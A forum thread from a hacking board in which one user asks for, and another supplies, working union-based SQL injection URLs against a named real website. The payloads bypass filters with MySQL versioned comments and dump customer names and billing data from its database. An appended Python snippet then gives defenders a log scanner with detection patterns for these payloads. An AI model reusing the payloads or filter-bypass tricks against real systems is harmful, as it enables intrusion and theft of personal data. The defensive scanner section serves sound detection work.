Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
dump in 1 shoot and 2 problem...ajkaro surely for you :P
Posted by: kenjii
Date: December 07, 2013 08:37AM

hi all it's me again :)

I'm having 2 problems with this website:

http://www.atpcb.com/atp/categories.php?p_cat=0

I can get it like this:
http://www.atpcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!50000Group_Concat(table_name)*/,4,5,6,7,8,9,10,11,12+from+/*!information_schema*/.tables+where+table_schema=database()

But I reach the 1024 limit,
so I use ajkaro's syntax for dump in 1 shot:

http://www.atpcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,(/*!50000SeLeCt*/(@x) from (/*!50000SeLeCt*/(@x:=0x00), (@running_number:=0),(/*!50000SeLeCt*/(0) from ( /*!50000information_schema*/.tables ) where (table_schema=database()) and (0x00) in (@x:=concat (@x,0x3c62723e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x2e20,table_name))))x),4,5,6,7,8,9,10,11,12

OK, this works fine. I do the same to get the columns and it works fine too.

Now my problem number one is:

How do I get the data from a column with dump in 1 shot?
I mean I can get data, but I still reach the 1024 limit and can't get it all...
I tried many things but none seem to work for me :(


My 2nd problem is -> I can't get data from 1 column, the column "phone" from table x_billing.

With this SQLi:

http://www.atpcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!50000Group_Concat(first_name,last_name,address_1,address_2,city,state,zip_code,country)*/,4,5,6,7,8,9,10,11,12+from+x_billing

I get all the data, but if I add the "phone" column as well it doesn't work.

I also tried to get the phone column alone; that is not working either.

I have already seen some other websites with a similar problem but I can't resolve it...

How can I get this data?
Sorry for my bad English



Edited 1 time(s). Last edit at 12/07/2013 03:59PM by kenjii.

Re: dump in 1 shoot and 2 problem...ajkaro surely for you :P
Posted by: ajkaro
Date: December 11, 2013 01:07PM

Here you go:

hXXp://wXw.at[SLACKERS]pcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,concat (0x3c2f7469746c653e, (/*!50000SeLeCt*/(@) from(/*!50000SeLeCt*/(@:=0x00) ,(/*!50000SeLeCt*/(@) from(x_billing)where(@) in (@:=concat (@,0x0a,first_name,0x3a,last_name,0x3c62723e))))a),0x3c7469746c653e),4,5,6,7,8,9,10,11,12 -- -

Number of records with phone is 0 !!!
hXXp://wXw.at[SLACKERS]pcb.com/atp/categories.php?p_cat=-0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,concat (0x3c2f7469746c653e, (/*!50000SeLeCt*/count(*) from(x_billing) where phone is not null) ,0x3c7469746c653e),4,5,6,7,8,9,10,11,12 -- -

Re: dump in 1 shoot and 2 problem...ajkaro surely for you :P
Posted by: kenjii
Date: December 13, 2013 11:23AM

Thank you very much.

On other websites, when there is no data in a column it simply writes nothing and doesn't block me from getting other data. Thanks again for this info.

Re: dump in 1 shoot and 2 problem...ajkaro surely for you :P
Posted by: ajkaro
Date: December 13, 2013 02:25PM

When there is no data in some column and you are concatenating data from that column with some other column's data, remember:

CONCAT() returns NULL if any of those data is NULL !!!!

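For defenders reading this thread: the requests above wrap SQL keywords in MySQL versioned comments (`/*!50000UnIoN*/`), which MySQL executes but a plain keyword filter does not see. The Python sketch below is an added example, not part of the original thread; the rule names, function names and sample request targets are constructed for illustration, and it shows a log check that unwraps those comments before matching.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*! ... */ and /*!NNNNN ... */ comments, so the
# body must be kept (unwrapped) before keyword matching, not discarded.
VERSIONED = re.compile(r"/\*!(?:\d{5})?(.*?)\*/", re.S)
PLAIN = re.compile(r"/\*.*?\*/", re.S)  # ordinary comments act as whitespace

RULES = {  # hypothetical rule names, matched against the normalized text
    "union_select": re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\b"),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "user_variable_assignment": re.compile(r"@\w*\s*:="),
}

def normalize(target: str) -> str:
    """URL-decode, unwrap versioned comments, drop plain ones, fold case."""
    text = unquote_plus(target)
    text = VERSIONED.sub(r" \1 ", text)
    text = PLAIN.sub(" ", text)
    return re.sub(r"\s+", " ", text).lower()

def scan(target: str) -> list[str]:
    """Return the sorted names of every rule the request target triggers."""
    hits = [name for name, rx in RULES.items() if rx.search(normalize(target))]
    if VERSIONED.search(unquote_plus(target)):
        hits.append("versioned_comment")  # rare in legitimate query strings
    return sorted(hits)

def naive_match(target: str) -> bool:
    """Keyword filter without comment unwrapping, shown for comparison."""
    return "union select" in unquote_plus(target).lower()

SAMPLES = [  # constructed request targets, as they might appear in an access log
    "/atp/categories.php?p_cat=7",
    "/search?q=credit+union+rates",
    "/atp/categories.php?p_cat=-0%20/*!50000UnIoN*/%20/*!50000SeLeCt*/%201,2,3",
    "/atp/categories.php?p_cat=-0+/*!50000UnIoN*/+/*!50000SeLeCt*/+1,"
    "/*!50000Group_Concat(table_name)*/+from+/*!information_schema*/.tables",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(naive_match(s), scan(s), s[:60])
```

Detection of this kind only supplements the actual fix, which is binding `p_cat` as a typed parameter in a prepared statement so that no request text reaches the SQL parser.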